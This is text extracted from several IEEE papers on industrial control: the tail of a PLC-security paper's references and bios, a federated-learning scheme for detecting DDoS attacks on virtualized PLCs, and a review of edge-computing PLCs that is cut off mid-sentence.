Conf. Comput. Commun. Secur. , 2012, pp. 439 449. [47] A. Serhane, M. Raad, R. Raad, and W. Susilo, PLC code-level vulner- abilities, in Proc. Int. Conf. Comput. Appl. , 2018, pp. 348 352. [48] S. E. Valentine, PLC code vulnerabilities through scada systems, Ph.D. dissertation, Univ. South Carolina, 2013. [Online]. Available: https://scholarcommons.sc.edu/etd/803 [49] Siemens, SIMATIC STEP 7 Basic/Professional V16 and SIMATIC WinCC V16, 2019, [Online]. Available: https: //support.industry.siemens.com/cs/document/109773506/simatic-step- 7-basic-professional-v16-and-simatic-wincc-v16?dti=0&lcn-WW WAEL ALSABBAGH (Member, IEEE) received the B.S. and M.S. degrees in automatic control and computer engineering from Al-baath University, Homs, Syria, in 2012 and 2015, respectively. He is currently working toward the Ph.D. degree in com- puter science with the Technical University of Cot- tbus, Cottbus, Germany. Since 2018, he has been a Scientist with the IHP-Leibniz-Institut f r Innova- tive Mikroelektronik, Frankfurt (Oder), Germany. His research interests include the cyber-attacks and security, mitigation methods of the attacks target- ing industrial control systems, and supervisory control and data acquisition. PETER LANGEND ERFER received the Diploma and Ph.D. degrees in computer science. Since 2000, he has been with the IHP-Leibniz-Institut f r Innovative Mikroelektronik, Frankfurt (Oder), Germany. In the IHP-Leibniz-Institut f r Innova- tive Mikroelektronik, he is leading the Wireless Systems Department. From 2012 to 2020, he was leading the Chair for security in pervasive sys- tems with the Technical University of Cottbus- Senftenberg, Cottbus, Germany. Since 2020, he owns the chair wireless systems with the Technical University of Cottbus-Senftenberg. He has authored or coauthored more than 150 refereed technical articles, led 17 patents of which ten have been granted already. His research interests include security for resource constraint devices, low power protocols, and ef cient implementations of AI means and re- silience. He was a Guest Editor of many renowned journals, such as Wireless Communications and Mobile Computing (Wiley) and ACM Transactions on Internet Technology . 162 VOLUME 3, 2022
FedTIU_Securing_Virtualized_PLCs_Against_DDoS_Attacks_Using_a_Federated_Learning_Enabled_Threat_Intelligence_Unit.pdf
Conventional Programmable Logic Controller (PLC) systems are becoming increasingly challenging to manage due to hardware and software dependencies. Moreover, the number and size of conventional PLCs on factory oors continue to increase, and virtualized PLC (vPLC) offers a solution to address these challenges. The utilization of vPLC offers the advantages of streamlining communication between high-level applications and low-level machine operations, enhancing programming ability in process control systems by abstracting control functions from I/O modules, and increasing automation in industrial control networks. Nevertheless, the connection of vPLC to the internet and cloud services presents a considerable cybersecurity risk, and the crucial aspect of information security for vPLCs is ensuring their availability. Distributed Denial of Service (DDoS) attacks can be particularly devastating for vPLCs, as they rely on internet connectivity to function. DDoS attacks on vPLC overwhelm it and causing it to become unavailable. vPLCs manages control systems and if targeted by a DDoS attack, these systems could become unresponsive, leading to signi cant disruption to industrial processes. Thus, implementing effective DDoS protection measures is crucial for ensuring the availability and reliability of vPLCs in industrial settings. Therefore, this work proposes a Federated learning enabled Threat Intelligence Unit (FedTIU) for detecting DDoS attacks on vPLCs on an Edge Compute Stack near to vPLC. The proposed approach involves collaborative model training using federated learning techniques to gain knowledge of new attack patterns from other industrial sites while maintaining data privacy. Index T erms IIoT, Industry 4.0, Federated Learning, DDoS Detection, vPLC I. I NTRODUCTION Industry 4.0 aims to break away from the conventional au- tomation pyramid by closely integrating production and busi- ness levels through cyber-physical systems (CPSs), which con- nect physical and virtual worlds. This integration will enable automation systems to become more exible and intelligent [1]. However, the current industrial landscape is characterized by specialized hardware and software components designed for speci c purposes, resulting in a mix of communication technologies within industrial automation. An instance of this would be Programmable Logic Controllers (PLCs), which have the task of regulating tangible procedures by utilizing The project is funded by Science Foundation of Ireland (SFI) under the Grant 16/RC/3918 and EU s MSCA with agreement Number 847577sensors and actuators to interact with the physical realm. These devices are customized and commissioned for speci c appli- cations and use cases, and also employ proprietary hardware and software, often speci c to the manufacturer, which makes it challenging to integrate different systems and can lead to vendor lock-in [2]. Virtual Programmable Logic Controllers (vPLCs) address the limitations of traditional PLCs by utilizing virtualization technology [3]. With vPLCs, deterministic real-time control is executed on virtualized edge servers, and the cloud provides the comprehensive vPLC management interface. This means that vPLCs are not limited to speci c hardware and can be easily scaled and modi ed based on changing requirements. Thus, vPLCs offer increased exibility, scalability, and cost- effectiveness compared to traditional PLCs. As the vPLC solution is cloud-based, it supports the in- tegration of production and business levels and offers in- creased resilience. The VMware Edge Compute Stack (ECS) ef ciently manages resources located at the edge accord- ing to each vPLC s requirements. Furthermore, the complete virtualization of PLC controls utilizing the VMware ECS, which facilitates the operation of Virtual Machines (VM) and containers on standard IT servers at the edge, plays a crucial role in enhancing industrial automation. In summary, vPLCs offer increased exibility, scalability, and cost-effectiveness compared to traditional PLCs. However, Industrial control systems (ICS), including vPLCs are vulnerable to cyberattacks that can have severe con- sequences for critical infrastructure [4]. Attackers aim to compromise vPLC systems by exploiting vulnerabilities in the communication protocols or gaining unauthorized access to one of the systems in the industrial networks. Denial- of-Service (DoS) and Distributed Denial-of-Service (DDoS) attacks [5] are the major threat to the availability of vPLCs, as they can exhaust system resources and cause downtime. Furthermore, the ModBus/TCP , Pro net/IP , DNP3 communi- cation protocol used by vPLCs lacks built-in security features, making it susceptible to attacks that ood the system with TCP SYN requests. Conventional security solutions, such as anti-virus software and intrusion detection systems, are not suitable for safe- guarding vPLCs as a result of their constrained resources. 2332023 IEEE International Conference on Smart Computing (SMARTCOMP) 2693-8340/23/$31.00 2023 IEEE DOI 10.1109/SMARTCOMP58114.2023.000582023 IEEE International Conference on Smart Computing (SMARTCOMP) | 979-8-3503-2281-1/23/$31.00 2023 IEEE | DOI: 10.1109/SMARTCOMP58114.2023.00058 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:27 UTC from IEEE Xplore. Restrictions apply. Furthermore, the effectiveness of existing Machine Learning (ML) and Deep Learning (DL) models for detecting such attacks is limited due to the lack of data available for training the model within the industrial site. Additionally, these isolated models are not equipped to recognize new attack types or variants encountered by other industries, which is critical information as it could potentially affect their industry in the future. Therefore this research work proposes a solution to address DDoS attacks on vPLCs in industrial settings by utilizing Federated Learning (FL). The solution involves a Federated Learning enabled Threat Intelligence Unit (FedTIU) located along with vPLC at the VMware ECS. FedTIU at ECS acts as a gateway for all requests to the vPLC. The FedTIU uses a trained model to classify the request as either an attack or normal, and with FL, the classi cation result can be shared with other clients by utilizing a global model. The rest of the paper is organized as follows: Section 2 describes the background and information related to vPLC and an overview of the existing state-of-the-art techniques. Section 3 presents the attack scenario and section 4 describes the proposed approach against DDoS attack to secure vPLC. Section 5 concludes this work and also discuss about the work in progress for further research. II. B ACKGROUND AND RELA TED WORK This section presents the introduction about vPLC and also discusses the existing state of art techniques present in the literature to handle cyber attacks in ICS. A. About vPLC Since the 1970s, PLCs have been ubiquitous in ICS, offering control to autonomously regulate industrial processes. The manufacturing sector commonly employs various PLCs to precisely perform I/O controls. However, every PLC has been a specialized single-purpose hardware component that requires a controller unit, making it a bulky and costly element to host on-site. Moreover, it is also quite costly if needs to be updated once deployed [6]. In recent years, there has been a drive to separate the logic and control functionalities (software) of the PLC from the I/O element (hardware) [3]. This enables the separation of discrete PLCs from the industrial oor and allows the hosting of control functions at the edge (ex. ECS) in the form of vPLCs [7]. Moreover modernization of the industrial automation com- ponents is happening at pace because it is reducing hardware costs by moving to common Information Technology (IT) infrastructure and commodity hardware. It is also improving operational ef ciency and reducing cost by allowing the PLC to be remotely programmed and upgraded, eliminating on-site visits of the PLC programmer. A virtualization approach to the PLC and the ability to remotely program the PLC is enabling agility and operational ef ciency not possible with the current approach.For example, Software De ned Automation is hosting an in- dustrial Control-as-a-Service offering, leveraging IEC 61131-3 automation software that is allowing for the virtualizing of the PLC software logic within a real-time hypervisor [8]. The IT architecture of Control-as-a-Service builds on the cloud computing paradigm, using an on-premise edge compute stack along with network connectivity to the public cloud [9]. Nevertheless, conventional SCADA and the protocols used, such as Modbus/TCP , Pro net/IP , DNP3, etc., play an indispensable role in communication with most PLC devices. Regrettably, most of these protocols do not have security fea- tures nor authentication required to execute remote commands on a control device. Consequently, the vPLC environment is susceptible to cyber-physical attacks. B. State of Art T echniques in ICS In the current state of research, the development of solutions to counter DDoS attacks and other cyber threats against vPLCs is lacking. The relative novelty of vPLCs has not yet drawn signi cant attention from researchers in this area. Nevertheless, there are some existing solutions that have been proposed by researchers to address cyber threats in traditional ICS. DDoS attacks targeting ICS systems have been a topic of research from years back. Teixeira et al. [10] have examined various types of attacks on control systems that concentrate on disrupting communication between sensors/actuators and a PLC. The protection of PLCs from attacks is challenging due to their limited computing power, resulting in limited research on this topic. In a study by Xiao et al. [11], introduced an approach for detecting anomalies in PLCs using power consumption data. However, these existing solutions against attack detection for PLC are not applicable for providing defense against vPLC. Because vPLCs are software-based emulations of physical PLCs, and as such, they have different security concerns and limitations than physical PLCs. Therefore, new defense mechanisms and security solutions speci cally designed for vPLCs are needed to address the unique security challenges posed by virtualization. III. A TTACK SCENARIO ICS domain faces various attack vectors, but vPLCs are particularly vulnerable due to their integration with cloud com- puting. Attacks on vPLCs fall into three primary categories: attacks that target availability, con dentiality, and integrity. The present work focuses on the scenario depicted in Figure 1 where an attacker, located outside the industrial facility, exploits a vulnerability of the system (existing within the industry periphery) from the public network to gain access to the industrial system. The attacker can gain access through any public website opened by a worker within the industrial site. Once access is gained, the attacker performs a DDoS attack by sending Modbus/TCP packets to the vPLC at a higher rate in comparison to that it was designed to handle. This slows down the supporting supervisory functions of the vPLC, 234 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:27 UTC from IEEE Xplore. Restrictions apply. Fig. 1. Attack scenario considered including sharing alarms, collecting management records, and re-con guring the I/O hardware element connected to the vPLC. The attacker executes an ARP spoo ng attack after getting the internal system access by transmitting fraudulent ARP messages that link the attacker s MAC to the IP addresses of both the vPLC and Human Machine Interface (HMI). This enables the attacker to intercept and manipulate network traf c or stop all communication, causing a DoS attack. By executing a DoS attack, the attacker aims to place the system in an unsafe state, hindering the administrative user s ability to supervise or regulate the industrial system. This type of attack is in uenced by the approach outlined in [6]. IV . FL ENABLED THREA T INTELLIGENCE UNIT This section presents federated learning enabled Threat Intelligence Unit to detect the DDoS attack request against vPLC hosted on the edge compute stack in the manufacturing industry. The system model architecture considered is shown in Figure 2 and consists of different sites of manufacturing industries. Instead of hardware PLC, each industry is using a vPLC hosted at ECS. The vPLC processes the request made by the components of an industrial site. However, DDoS attacks can affect the availability of vPLC for serving the benign request as mentioned in section III. The proposed FedTIU sits along the vPLC at ECS and con- sists of three major components; Threat Analysis Unit (TAU), the Screening and ltering Unit (SFU), and the aggregator associated with the ARIA cloud. In more detail, the SFU contains a Traf c Policy Database (TPD) and Filtering Sub- Unit (FISU). TAU includes an Espy Sub-Unit (ESU), Local Training Sub-Unit (LTSU), and the Database (DB) to train the local model. LTSU is responsible for training the local model on the local dataset collected through the ESU. Figure 3 presents the architecture details of the proposed FedTIU. For all the incoming traf c, it will be forwarded to SFU (1). In SFU the TPD forwards it to FISU (2) orsends it to TAU for analysis purposes (3) when no policy is available. ESU classi es the traf c using edge data analysis, responding to the query (4). Meanwhile, ESU noti es LTSU of the suspicious ow (5) and stores the traces in DB. LTSU uses the informed ow to retrain the global model and sends training results to ESU (6). LTSU then distributes policies to TPD (7) and FISU (8). Finally, FISU rejects (9) or sends (10) the ow to access vPLC. A. Threat Analysis Unit The Threat Analysis Unit is responsible for training the local model and predicting new threats. The TAU coordinates with the SFU to respond to new threats and provide policies for them to the TPD and the FISU for future detection. The TAU consists of two major components; (i) an ESU and associated Database which is responsible for classifying the request as per edge data analysis and responding to TDP for the requested query, but does not update the policy. (ii) The LTSU, another TAU unit responsible for performing the local training on the local data. Here we used the hybrid CNN+GRU+MLP based DL model for training the local model. Whenever ESU detects a new treat, it noti es it to the LTSU then the LTSU retrains the model and shares it to the aggregator for global model aggregation. The training results are then sent to TPD and FISU to update and store the policies for the future. B. Screening and Filtering Unit SFU is responsible for monitoring and ltering incoming requests as per the de ned policies. SFU consists of two major components; (i) TPD which is used to store the policies, whenever a request arrives for vPLC it will be rst checked with TPD. If policies exist for such requests they will be forwarded to FISU for ltering. (ii) FISU, lters the traf c as per the traf c policy, i.e. forwards it to vPLC or rejects the ow. C. Aggregator The aggregation process is a crucial step in federated learning, where the model gradients from different LTSUs are combined to update the global model. In our proposed approach, a scheduler selects participants, send the global model to them, participants retrain the model, and send the updated models back for aggregation to update the global model. V. C ONCLUSION There are a number of attack vectors against industrial control systems, but for vPLCs they will now inherit attacks with a heritage in the Internet world, with the adoption of the cloud computing paradigm. Additionally, the communication protocols employed by vPLC lack built-in security measures and do not usually mandate any authentication for executing commands remotely on control devices. Thus the vPLC envi- ronment is open to cyber-physical attacks. In this study, our focus is on the DDoS attack which can affect the availability of vPLC services for its intended users. 235 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:27 UTC from IEEE Xplore. Restrictions apply. Fig. 2. System model architecture Fig. 3. Architecture of proposed FedTIU approach Therefore, this work proposed a Federated learning enabled Threat Intelligence Unit to detect DDoS attacks against vPLCs hosted on the ECS in the manufacturing industry. The pro- posed approach consists of three major components: Threat Analysis Unit, Screening and Filtering Unit, and Aggregator. The system model architecture is designed to enable other industrial sites to get their local DL model to learn about the attack in case if it happens on one site, improving the over- all security of the industrial ecosystem. Moreover, proposed model also leverages collaborative learning using FL along with ensuring the data privacy of the individual industrial sites. However, we are working on to simulate the similar envi- ronment to test the proposed approach and include the results in our future research. ACKNOWLEDGMENT The project is funded by Science Foundation of Ireland (SFI) under the Grant 16/RC/3918 and EU s MSCA withagreement Number 847577. This work has also received support from the VMware Academic Program. In order to promote open access, the author has chosen to apply a CC BY public copyright license to any version of the Author Accepted Manuscript that results from this submission. REFERENCES [1] M. Wollschlaeger, T. Sauter, and J. Jasperneite, The future of industrial communication: Automation networks in the era of the internet of things and industry 4.0, IEEE industrial electronics magazine , vol. 11, no. 1, pp. 17 27, 2017. [2] E. R. Alphonsus and M. O. Abdullah, A review on the applications of programmable logic controllers (plcs), Renewable and Sustainable Energy Reviews , vol. 60, pp. 1185 1205, 2016. [3] T. Cruz, P . Simoes, and E. Monteiro, Virtualizing programmable logic controllers: Toward a convergent approach, IEEE Embedded Systems Letters , vol. 8, no. 4, pp. 69 72, 2016. [4] P . V erma, J. G. Breslin, and D. O Shea, Fldid: Federated learning enabled deep intrusion detection in smart manufacturing industries, Sensors , vol. 22, no. 22, p. 8974, 2022. [5] P . V erma, S. Tapaswi, and W. W. Godfrey, A request aware module using cs-idr to reduce vm level collateral damages caused by ddos attack in cloud environment, Cluster Computing , pp. 1 17, 2021. [6] T. Alves, R. Das, A. Werth, and T. Morris, Virtualization of scada testbeds for cybersecurity research: A modular approach, Computers & Security , vol. 77, pp. 531 546, 2018. [7] Virtualized programmable logic controllers a paradigm shift toward industrial edge and cloud computing, an industrial internet consor- tium tech brief 20210907. https://www.iiconsortium.org/pdf/IIC-Edge- vPLC-Tech-Brief-20210907.pdf. Accessed: 2023-03-02. [8] O. Givehchi, J. Imtiaz, H. Trsek, and J. Jasperneite, Control-as-a- service from the cloud: A case study for using virtualized plcs, in 2014 10th IEEE W orkshop on Factory Communication Systems (WFCS 2014) , pp. 1 4, IEEE, 2014. [9] A. Willner and V . Gowtham, Toward a reference architecture model for industrial edge computing, IEEE Communications Standards Magazine , vol. 4, no. 4, pp. 42 48, 2020. [10] A. Teixeira, D. P erez, H. Sandberg, and K. H. Johansson, Attack models and scenarios for networked control systems, in Proceedings of the 1st international conference on High Con dence Networked Systems , pp. 55 64, 2012. [11] Y .-j. Xiao, W.-y. Xu, Z.-h. Jia, Z.-r. Ma, and D.-l. Qi, Nipad: a non-invasive power-based anomaly detection scheme for programmable logic controllers, Frontiers of Information T echnology & Electronic Engineering , vol. 18, pp. 519 534, 2017. 236 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:27 UTC from IEEE Xplore. Restrictions apply.
FedTIU: Securing Virtualized PLCs Against DDoS Attacks Using a Federated Learning Enabled Threat Intelligence Unit Priyanka V erma1, Miguel Ponce De Leon2, John G. Breslin1, Donna O Shea3 1Data Science Institute, University of Galway, Ireland, { rstname.lastname }@universityofgalway.ie 2VMware Research, VMware, Cork, Ireland, [email protected] 3Department of Computer Science, Munster Technological University, Cork, Ireland, [email protected]
Potential_of_Edge_Computing_PLCs_in_Industrial_Automation.pdf
Ongoing industrial revolution Industry 4.0, driven by a mesh of disruptive new technologies, promises a more effective and productive industrial environment. The challenges that have arisen as a side effect, such as the vast quality of data that needs to be transmitted and processed safely in real-time, require a new computing approach. One of the paradigms being used to conquer this problem is Edge computing which, due to an increase in the performance and enhancement of storage capacities, moves data processing closer to the data origin. This new approach is being applied to Programmable Logic Controllers (PLCs), the core of industrial automation since the 1960s. This paper offers a parallel comparison of state-of-the-art PLCs that are adopting Edge computing principles and their fit in an already complex industrial network.
21st International Symposium INFOTEH-JAHORINA, 16-18 March 2022 978-1-6654-3778-3/22/$31.00 2022 IEEE In d u s tr y 4 .0S y s te m I n te g r a tio n A u g m e n te d r e a lityM a c h in e le a r n in g S im u la tio n s A d d itiv e M a n u fa c tu r in gB ig D a ta A u to n o m o u s R o b o ts C y b e r s e c u r ityC lo u d / E d g e c o m p u tin g Figure 1: Industry 4.0 - enabling technologies [5] Potential of Edge Computing PLCs in Industrial Automation Zorana Mandi Faculty of Electrical Engineering University of East Sarajevo East Sarajevo, Bosnia and Herzegovina [email protected] Stevan Stankovski, Gordana Ostoji Faculty of Technical Sciences University of Novi Sad Novi Sad, Serbia [email protected] , [email protected] Bo idar Popovi Faculty of Electrical Engineering University of East Sarajevo East Sarajevo, Bosnia and Herzegovina [email protected] Keywords- Edge computing, PLCs, Industry automation I. INTRODUCTION Industrial revolutions have changed the way of manufacturing and production of goods by utilizing disruptive new technologies. The first industrial revolution, starting in the late 18th century, introduced water and steam power that replaced human and animal labor [1]. One century later, the second revolution, characterized by new power sources (e.g. electric power) and the introduction of assembly lines, brought mass production to life. The third revolution began in the middle of the 20th century, with emphasized use of digital technologies. Industrial computers, designed to operate in the industrial environment, as well as advanced telecommunications, were incorporated into factories and all that led to the digital transformation of industry. During this revolution, the control of industrial processes shifted from robust relay logic systems to Programmable Logic Controllers (PLCs). With PLCs, a functional connection was established between digital/analog inputs [2] and outputs as well as the development of flexible control algorithms. The ongoing transformation of industry coined as the fourth industrial revolution or Industry 4.0 was introduced in 2011 to describe the vision of German industry driven by the Internet [3]. Industry 4.0 has the aim of increasing productivity, efficiency, safety, and transparency in the industry through a high level of integration between information and communication technologies and machines in cyber-physical systems (CPS) [4]. Different new revolutionizing technologies such as the Industrial Internet of Things - IIoT are enablers of ongoing transformation [5], as shown in Fig. 1. In the paradigm of IIoT, a significant number of connected types of machinery and objects are generating a vast quantity of data. Another characteristic of industrial applications is the necessity of real-time analyses and decision-making, which makes them latency-sensitive applications. Enormous quantity of data that needs to be transmitted and analyzed in a fast and secured environment may act as a challenge to a centralized cloud computing platform. To overcome the limitations of cloud computing and to satisfy the challenging conditions which arise in Industry 4.0, the computing power is being brought closer to the data sources through Edge computing architecture, making Edge computing a part of the Industry4.0 portfolio, as discussed in [6] and emphasized in [7]. Due to the increase in the performance of computers and processing as well as the enhancement of storage capacities, Edge computing brings new opportunities to data manipulation [8]. PLCs are positioned on the very end of industrial network, where their traditional role is getting involved through the adaptation of Edge computing principles [9]. This paper will provide the review of edge PLCs i.e., the PLCs that are implementing Edge computing. 2022 21st International Symposium INFOTEH-JAHORINA (INFOTEH) | 978-1-6654-3778-3/22/$31.00 2022 IEEE | DOI: 10.1109/INFOTEH53737.2022.9751324 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:08 UTC from IEEE Xplore. Restrictions apply. Level 0Level 1Level 2Level 3Level 4 ERP MES SCADA/HMI PLCs/PACs SENSORS/ACTUATORS Figure 3: ISA-95 standard reference architecture [20] This paper is structured as follows: Section 2 provides an overview of Edge computing. How industrial automation has changed the implementation of the Edge computing paradigm is discussed in Section 3, which also provides an overview of one of the reference architectures that are accommodating edge principles. Section 4 provides a comparison of three edge PLCs. II. EDGE COMPUTING At first glance, Edge computing represents a new computing paradigm that acts as a successor of the Cloud era in the history of computer technology, but the first ideas of Edge computing can be traced back to the 1990s and content delivery networks [10]. Even though the ideas of edge were planted over 30 years ago, Cloud computing was predominant during that time. Cloud computing delivered a revolutionary approach to data processing that enabled high-end data manipulation that originated from devices with modest processing capabilities. As mentioned in [11], 75% of enterprises will have adopted distributed processing without a data center or cloud by 2022, making Edge computing the main processing solution. Although edge is becoming predominant, there is still a strong connection between edge and cloud. Cloud is still suitable for non-real-time big data analysis, which is business-oriented, while Edge computing provides data analysis on local scope, which is usually real- time and control-oriented. Significant part of the computing and even storage is transferred from the cloud to the edge, making cloud servers less loaded [12]. Cloud still has an important role, as data is continuing to be transferred for further analysis and storage. Bringing computing closer to the physical layer of a network not only reduces latency and usage of network resources, but also strengthens data security [12]. The main difference between Cloud and Edge computing is the server location: cloud services are located within the Internet while services provided through Edge computing lay in the edge of the network [12]. Figure 2: Connection cloud-edge-devices (Image source: Techtarget) Edge computing architecture can be presented in the form of a three-layer architecture [13], as shown in Fig 2, or in in four layers representation of edge architecture where Internet gateways are independent entities [14]. Presented architecture describes a synergy between edge devices, or devices that collect data, Edge computing nodes or short edge nodes and cloud servers. Functions of edge nodes depend on their possible location, including macro base stations, IoT gateways, 5G base stations, etc., as well as on their distance from the user [15]. Edge analytic or a process of gathering and analyzing data on the edge of the network has a few major advantages [14]: reduced latency and storage costs, scalability, bandwidth reduction, increased cost-effectiveness and privacy and security preservation. Application domain of Edge computing is wide: from virtual reality [15], applications using 5G networks [16], transportation [17], to smart grids [18]. From 107 concrete user cases retrieved from comprehensive market analyses, available in [19] 10% belongs to the industry domain. Constraint of Edge computing on industrial automation will be discussed next. III. INDUSTRIAL AUTOMATION TRADITIONAL CONCEPT AND EDGE COMPUTING CONCEPT The International Society of Automation has developed the ISA-95 standard to describe the interface between control automation systems and enterprises. Pursuant to this standard, industrial automation systems follow 5-level reference architecture, as shown in Fig 3 [20]. Automation control, a symbiose of sensor/actuators and PLC/PACs, is placed on Levels 0 and 1. SCADA (Supervisory Control And Data Acquisition) used for monitoring is positioned on Level 2. Those levels require short response time and real-time analysis. MES (Manufacturing Execution Systems) on Level 3 and ERP (Enterprise Resource Planning) on Level 4 require information on a daily or weekly basis. A high volume of opportunities for research comes together Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:08 UTC from IEEE Xplore. Restrictions apply. Mass and Heterogeneous Connection Real -time Services Data Optimization Smart Applications Security and Privacy ProtectionC R O S SVALUES Figure 4: CROSS values of Edge computing [22] Physical world Cyber worldCLOUD TIER EDGE TIER FIELD TIERPLANT SCOPEENTERPRISE ECOSYSTEM SCOPE Real worldEdge nodes Things, People and EnviromentsConnected devices and Smart objectsEdge gateways Edge processingCloud servers Applications F igure 5: Reference architecture with three main tiers [24] with the rising population of Edge computing. Edge computing consortium, [21] has as assessed that Edge computing services deliver important CROSS values to industry digitalization (Fig 4): Connectivity of heterogeneous networks, which are populated with a mass quantity of devices, is the main pillar of Edge computing. The rising quantity of devices, as well as the interoperability of long existing industrial networks, label connectivity as one of the challenges of Edge computing. Industrial systems are latency-sensitive and require real-time analysis. Therefore, reducing latency and providing real-time services are some of the main contributions of Edge computing and one of the key research points, as elaborated in [22]. As a bridge between the physical and cyber world, edge serves as the first entry of a large amount of heterogeneous data which leads to the high importance of data optimization. Edge intelligence is making smart applications more efficient and provides major cost advantages. Security on the edge of a network includes device security, network security, and data and application security, where end-to-end protection is critical. With Edge computing entering the industry, there is an arising need to develop the reference architecture to accommodate edge principles in already existing industrial architecture. One of the reference architectures (RA) has been developed as a result of the H2020 FAR-EDGE [23] project by using the concepts of tiers and scopes to describe the structure of a system. Scopes define the mapping of system elements to a factory Plant scope or wider corporate IT enterprise ecosystem scope. Plant scope covers levels 0 to level 4, while ERP is part of the Enterprise ecosystem scope. Tiers can be tied to scopes but are technical-oriented classifications that divide a system into three main tiers as shown in Fig 5 with one support tier which provides services to other tiers. Bottom layer is the field tier layer, which consists of edge nodes and entities of the real world. Edge nodes, according to FAR-EDGE, are any devices that represent the bridge between the digital world on one side and the physical world on the other, with embedded intelligence (smart objects) or without it (connected devices). Second, and the core of RA, is the edge tier populated by edge gateways, computing devices more intelligent than edge nodes that host software executing edge processes, i.e. real-time analysis. The top layer of discussed RA is the cloud tier where cloud servers are deployed. The cloud servers host the business logic and have the widest scope of all the tiers. A cloud tier can be located on commercial clouds or on private clouds i.e., corporate data centers, to minimize privacy risks. Besides FAR-EDGE RA, Edge Computing Consortium and Industrial Internet Consortium proposed the RA which are described in [21]. IV. EDGE PLC S: STATE -OF-THE-ART In FAR-EDGE reference architecture, PLCs are positioned in field tier and labeled as edge nodes: smart objects. In the following section state-of-the-art PLCs will be presented, some of which are the outgrown position of edge nodes and can be labeled as edge gateways. A. ControlEdge PLC According to the Honeywell Process Systems manufacturer, ControlEdge PLC [25], is an advanced loop and logic controller characterized by modular design. Designed to comply with control and data management needs, this PLC is focused on connectivity. CPU modules, based on the e300 32- bit RISC PowerPC Architecture, handle the fast digital scanning and analog scanning through a dual scan method that supports a wide range of function block algorithms. Open Ethernet communication provides peer-to-peer communications between controllers as well as access by HMI or SCADA software applications. ControlEdge series offers redundant PLC with which the CPUs communicate, with up to 12 I/O modules over Ethernet or fiber optics. The operator interface provided by Honeywell, as well as third-party interfaces can be used for user interface support. B. GRV-EPIC-PR1 and GRV-EPIC-PR2 GRV-EPIC-PR1 and GRV-EPIC-PR2 are modular Edge computing PLCs that form the Groov EPIC (Edge Programmable Industrial Controller) [26] system. According to the manufacturer, it offers reliable real-time control that can be designed by using flowchart programming through PAC Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:45:08 UTC from IEEE Xplore. Restrictions apply. (by combining the PLC characteristics of a real-time machine with the strengths of personal-computer based systems creating Programmable Automation Controllers - PACs.) control, IEC 61131-3 compliant programs and, also, by using programming languages Python, C/C++ with access to the Linux OS. The collection, processing, exchange, and display of data at the very edge of the network are enabled via tools like Ignition Edge, Node-RED and MQTT. The integral touchscreen is used for on-premises data visualization, which can be done on an external HDMI monitor or web and mobile applications. C. MELIPC MI5000 Mitsubishi Electric Corporation brought out an Edge computing solution to industrial automation processes, composed of industrial computer MELIPC and software solutions. Leading hardware solution is incorporated in an industrial computer, the MELIPC MI5000 [27], create signed to implement real-time demands of industrial applications alongside an Edge computing application. The MI5000 is able to perform device control and data collection due to the VxWorks operating system, which stands as pre-installed software. Besides the VxWorks operating system, MI5000 can run Windows at the same time, which enables analysis display of acquired data and powerful processing at the edge. Industrial computer is equipped with CC-Link IE Field Network port and CC-Link IE Field Network Basic port, making compatible products easy to connect. Installing of additional software allows easy collection of data from third- party companies. Table 1 presents the parallel comparison of mentioned PLCs based on main characteristics. TABLE I. COMPARISON OF EDGE PLCS ControlEdge HC900 Controller groov EPIC GRV-IAC-24 MELIPC MI 5000 Power supply 90 264 V AC 47 63 Hz 110 240 V AC 50 60 Hz 100 240 V AC 47 63 Hz Operating ambient temp. 0 60 C -20 70 C 0 55 C Vibration resistance 0 Hz to 14 Hz amplitude 2.5 mm (peak-to- peak), 14 Hz to 250 Hz acc. 1 g N/D Compliant with JIS B 3502 and IEC 61131-2 Mounting DIN rail DIN rail DIN rail Pollution degree = 2 N/D <= 2 Ability to add I/O modules YES YES YES CPU N/D Quad-core ARM Intel Core i7- 5700EQ 2.6 GHz Operating system N/D Linux Windows 10 IoT Enterprise 2016 (64bit) VxWorks 7.0 Memory capacity 64 MB or 128 MB (depending on CPU model) 2 GB RAM 2MB battery- backed RAM + 6 GB user space 12 GB1 + 45 GB2 (45 GB1) 1 GB1 + 4 GB2 Programming language IEC-61131-3 standard languages Flowchart with PAC Control or IEC-61131-3 standard languages Python, C/C++ Language supporting Windows OS + C/C++ 1. Windows 10 IoT Enterprise 2016 (64bit) 2. VxWorks 7.0 As one of the main values of Edge computing, previously mentioned, connectivity will be discussed, separately, and displayed in Table 2. TABLE II. CONNECTIVITY CAPABILITIES OF EDGE PLC S ControlEdge HC900 Controller groov EPIC GRV-IAC-24 MELIPC MI 5000 RS-232 0 4 selectable ports 1 RS-485 2 - USB ports 0 2 (2.0) 2 (3.0) + 2 (2.0) Additional ports HDMI Display port CC-Link IE Field Network1 Ethernet Network Connection 10Base- T/100BASE- TX/1000BASE- T 10Base- T/100BASE- TX/1000BASE- T 10Base- T/100BASE- TX/1000BASE-T RJ-45 connectors 1 or 2 (dependent on CPU model) 2 1 + 1 1. High-speed data collection from compatible devices Taking the FAR edge architecture as a reference, and the characteristics of these three PLCs, it is possible to attach one of the tiers and classify them accordingly. ControlEdge represents modest edge PLC capabilities, the main strength of which is the connectivity and its functionalities match edge nodes' functionalities. Groov EPIC controller act as a modular PLC equipped with a built-in display, which offers real-time applications but also acts as an edge gateway, locating it in the edge tier. The MELIPC MI5000 is an industrial computer performing Edge computing applications in real-time which can be, easily, connected to a PLC to perform control applications. This industrial computer acts as an edge gateway, located in the edge tier. These PLCs enable implementation applications based on architectures and services for vast data analytics like: Software as a service (SaaS), Platform as a service (PaaS), Infrastructure as a service (IaaS), Predictive maintenance, Protocols for IoT/IIoT data collection. All advantages of these PLCs can be utilized only if you have engineers with appropriate knowledge [28],[29]. New edge PLCs are ready to bring additional value for customers over standard PLCs which are used only for control tasks. V. CONCLUSION The vast data quantity, generated from heterogeneous devices in the industrial environment, that requires real-time decision making represents a motivation for implementing a new paradigm, Edge computing, to industrial automation. This paradigm is being applied to PLCs and industrial computers, devices at the very edge of the network, from which three are presented in this paper. Edge PLCs, which are equipped with 